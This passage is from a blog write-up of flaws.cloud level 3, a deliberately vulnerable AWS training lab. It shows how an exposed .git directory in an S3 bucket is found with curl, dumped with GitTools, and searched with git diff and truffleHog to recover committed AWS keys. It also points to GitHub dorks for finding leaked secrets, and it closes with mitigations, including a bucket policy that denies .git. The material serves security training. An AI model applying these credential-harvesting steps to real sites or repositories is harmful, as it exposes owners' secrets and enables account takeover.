subdirectory you can&rsquo;t see right now.</p>

<h1 id="the-flaw">The flaw</h1>

<p>In this level, we found an initial foothold on the account under attack. We
found credentials for one if the IAM users and can now perform all actions it
is authorized to do.</p>

<p>Multiple issues lead to us being able to do that. Like in the previous level,
we were able to use a configuration mistake to list the bucket without special
access rights (other than those we gave ourselves). The next issue is that the
creator of the homepage pushed the git repository into the bucket hosting the
page. In combination with careless handling of AWS credentials, attackers can
now get valid credentials. What could have been done to mitigate the danger of
that happening?</p>

<h2 id="prevent-bucket-listing">Prevent bucket listing</h2>

<p>By accidentally leaving the bucket open for everyone, we were enabled to list the
bucket and discover the git repository. Clearly this misconfiguration is bad
and should be avoided. In this case however we do not strictly need this
access. Since the website must be publicly available it is always
possible to request content via HTTP. S3 will serve all content in the bucket
via HTTP, including the git repository. Thus, it is easy to test if a git
repository is on a web server. In our case, the following curl command will
reveal that there is a repository:</p>

<pre><code> $ curl http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD
ref: refs/heads/master
</code></pre>

<p>&rdquo;.git/HEAD&rdquo; is a file that all git repositories have. Thus you can always just
request this file. If you get a response you know there is a repository. There
are several other standard file you could download. For a short introduction to
file structure, refer to this <a href="https://medium.freecodecamp.org/understanding-git-for-real-by-exploring-the-git-directory-1e079c15b807">blog post</a>.
The majority of content however is stored under &ldquo;.git/objects&rdquo; and file names
are SHA-1 hashes of the objects stored in the repository (more on objects <a href="https://git-scm.com/book/en/v2/Git-Internals-Git-Objects">here</a>).
Their location is not easily predictable.</p>

<p>Under certain circumstances it can be possible to dump a git repository even if
the web server does not allow listing files. <a href="https://github.com/internetwache/GitTools">GitTools</a>
provides a script for this purpose. In our example we can use it to get the
repository:</p>

<pre><code> $ ./gitdumper.sh http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ /tmp/repo
...
[*] Destination folder does not exist
[+] Creating /tmp/repo/.git/
[+] Downloaded: HEAD
...
[+] Downloaded: objects/c2/aab7e03933a858d1765090928dca4013fe2526
...
</code></pre>

<p>Note that this does not require any IAM credentials at all.
Now we can the result like before to explore the git history and find the keys.</p>

<pre><code> $ git diff b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 f52ec03b227ea6094b04e43f475fb0126edb5a61
diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
index 0000000..e3ae6dd
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAJ367LIFB4IJST7QA
+secret_access_key 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
</code></pre>

<p>A word of caution: be careful with git repositories you download from untrusted
sources. Always check out the &ldquo;.git/hooks&rdquo; folder. It contains the
<a href="https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks">hooks</a>, which are
shell scripts that developers like to run automatically on certain git commands
like <code>commit</code>, <code>push</code>, or <code>pull</code>. If you carelessly run git commands on a
repository, you may accidentally trigger a malicious script.
During normal git clones you <a href="https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks">do not get</a>
such hooks but if you download all files from a website you will. Not long ago
Git hooks caused <a href="https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/">some trouble</a>.</p>

<h2 id="keep-secrets-out-of-version-control">Keep secrets out of version control</h2>

<p>If no secrets had been committed to the git repository we would not have gained
access to the account. Obviously you should never commit them and if you do,
you must consider the secret as revealed and rotate credentials. Deleting a
secret from master does not delete if from the history of the version control
system.</p>

<p>Besides educating your team and checking for such problems in code reviews you
can run automated scanners to find secrets. This is handy both for defenders
(e.g., make it part of CI) and attackers (because real repositories are huge
and manual search takes time). For example, you could use <a href="https://github.com/dxa4481/truffleHog">truffleHog</a>.
To test drive it, just install with <code>pip install truffleHog</code>, then run it on the
repository we dumped in this level and it finds the key for you:</p>

<pre><code>truffleHog --regex --entropy=false /tmp/repo/
~~~~~~~~~~~~~~~~~~~~~
Reason: AWS API Key
Date: 2017-09-17 15:10:43
Hash: b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Filepath: access_keys.txt
Branch: origin/master
Commit: Oops, accidentally added something I shouldn't have

AKIAJ367LIFB4IJST7QA
~~~~~~~~~~~~~~~~~~~~~
...
</code></pre>

<p>Fun fact: this problem does happen a lot even in public GitHub repositories. Try search
queries like &ldquo;DELETE ENV&rdquo; which are be characteristic for commit messages
describing the &ldquo;fix&rdquo;. Or check out GitHub dorks repositories like <a href="https://github.com/techgaun/github-dorks">this one</a>.
They contain scripts for GitHub scanning.</p>

<h2 id="don-t-deploy-git-repositories">Don&rsquo;t deploy Git repositories</h2>

<p>The most obvious fix is to just not deploy the Git repository. It is not needed
to serve the website and should have never made it to the bucket in the first
place. A scan of the <a href="https://www.alexa.com/topsites">Alexa</a> Top 1M conducted
in 2015 (see <a href="https://www.internetwache.org/wie-ungeschutzte-git-repositorys-die-sicherheit-ihrer-webseite-gefahrden-eine-analyse-der-alexa-1m-28-07-2015/">here</a>,
German only) found ~10k /1% websites where this mistake was made. Thus, it
seems to actually happen quite a bit, albeit not frequently.</p>

<p>To be on the safe side, you can block access to a git repository just in
case it does get copied to an S3 bucket. For example, the bucket policy shown below
would grant public read to the entire bucket with the first statement. It is
required for public website access (<a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/WebsiteAccessPermissionsReqd.html">AWS docs</a>).
The second statement then overrides the first and denies access to the &ldquo;.git&rdquo; folder.
Remember that Deny trumps Allow and is evaluated first.</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-json" data-lang="json"><span></span><span style="color: #f8f8f2">{</span>
  <span style="color: #f92672">&quot;Version&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;2012-10-17&quot;</span><span style="color: #f8f8f2">,</span>
  <span style="color: #f92672">&quot;Statement&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #f8f8f2">[</span>
    <span style="color: #f8f8f2">{</span>
      <span style="color: #f92672">&quot;Sid&quot;</span><span style="color: #f8f8f2">:</span><span style="color: #e6db74">&quot;PublicRead&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Effect&quot;</span><span style="color: #f8f8f2">:</span><span style="color: #e6db74">&quot;Allow&quot;</span><span style="color: #f8f8f2">,</span>
	  <span style="color: #f92672">&quot;Principal&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;*&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Action&quot;</span><span style="color: #f8f8f2">:[</span><span style="color: #e6db74">&quot;s3:GetObject&quot;</span><span style="color: #f8f8f2">],</span>
      <span style="color: #f92672">&quot;Resource&quot;</span><span style="color: #f8f8f2">:[</span><span style="color: #e6db74">&quot;arn:aws:s3:::your-bucket/*&quot;</span><span style="color: #f8f8f2">]</span>
    <span style="color: #f8f8f2">},</span>
    <span style="color: #f8f8f2">{</span>
      <span style="color: #f92672">&quot;Sid&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;DenyGit&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Effect&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;Deny&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Principal&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;*&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Action&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;s3:*&quot;</span><span style="color: #f8f8f2">,</span>
      <span style="color: #f92672">&quot;Resource&quot;</span><span style="color: #f8f8f2">:</span> <span style="color: #e6db74">&quot;arn:aws:s3:::your-bucket/.git/*&quot;</span>
    <span style="color: #f8f8f2">}</span>
  <span style="color: #f8f8f2">]</span>
<span style="color: #f8f8f2">}</span>
</code></pre></div>

<h1 id="conclusion">Conclusion</h1>

<p>This level demonstrated that it is dangerous to commit secrets to Git
repositories as well as to make these repositories available on the website.
None of this is specific to the cloud or AWS in particular. Still, it is
important to know how to configure S3 buckets correctly to avoid it. Key
takeaways should be:</p>

<ul>
<li>never commit IAM credentials to Git repositories</li>
<li>never deploy Git repositories on your website</li>
<li>configure your web server - S3 in this example - to not allow listing and to
block access to .git, just in case a repository with a secret gets deployed</li>
</ul>

    </div>
    
    <footer>
      <hr>
      <p>
  Published
  
    
      by <span itemprop="author">Dominic Breuker</span>
    
  
  <time itemprop="datePublished" datetime="2019-10-27T00:00:00&#43;02:00">
    27 Oct, 2019
  </time>
  
    in <span itemprop="articleSection"><a href="/categories/aws/">AWS</a></span>
  
  
    and tagged <a href="/tags/aws/">AWS</a>, <a href="/tags/cloud/">cloud</a> and <a href="/tags/infosec/">infosec</a>
  
  using <span itemprop="wordCount">1934</span> words.
</p>

      


  <aside>
    <header>Related Content</header>
    <ul>
      
        <li><a href="/post/flaws_cloud_2/">flaws.cloud - Level 2</a>
        <time datetime="8M">8 minutes</time>
      
        <li><a href="/post/flaws_cloud_lvl1/">flaws.cloud - Level 1</a>
        <time datetime="6M">6 minutes</time>
      
        <li><a href="/post/htb_carrier/">Hack The Box Write-up - Carrier</a>
        <time datetime="25M">25 minutes</time>
      
        <li><a href="/post/htb_access/">Hack The Box Write-up - Access</a>
        <time datetime="11M">11 minutes</time>
      
        <li><a href="/post/htb_active/">Hack The Box Write-up - Active</a>
        <time datetime="12M">12 minutes</time>
      
        <li><a href="/post/htb_dropzone/">Hack The Box Write-up - Dropzone</a>
        <time datetime="10M">10 minutes</time>
      
        <li><a href="/post/htb_devoops/">Hack The Box Write-up - DevOops</a>
        <time datetime="7M">7 minutes</time>
      
    </ul>
  </aside>


    </footer>
  </article>
</main>
    <footer>
  

</footer>
  </body>
</html>
